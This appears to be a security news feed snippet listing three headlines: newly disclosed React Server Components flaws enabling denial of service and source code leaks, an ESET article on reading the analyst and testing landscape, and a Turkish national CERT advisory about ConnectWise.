New Vulnerabilities in React Server Components Allow DoS Attacks and Source Code Leaks Less than a week after addressing a critical Remote Code Execution (RCE) vulnerability, the React team has disclosed three additional security flaws affecting React Server Components (RSC). Security researchers discovered these new issues while attempting to bypass the mitigations for the previous…
-
Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece
Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience. Go to eset
-
TR-25-0449 (ConnectWise Güvenlik Bildirimi)
TR-25-0449 (ConnectWise Güvenlik Bildirimi) Go to usom.gov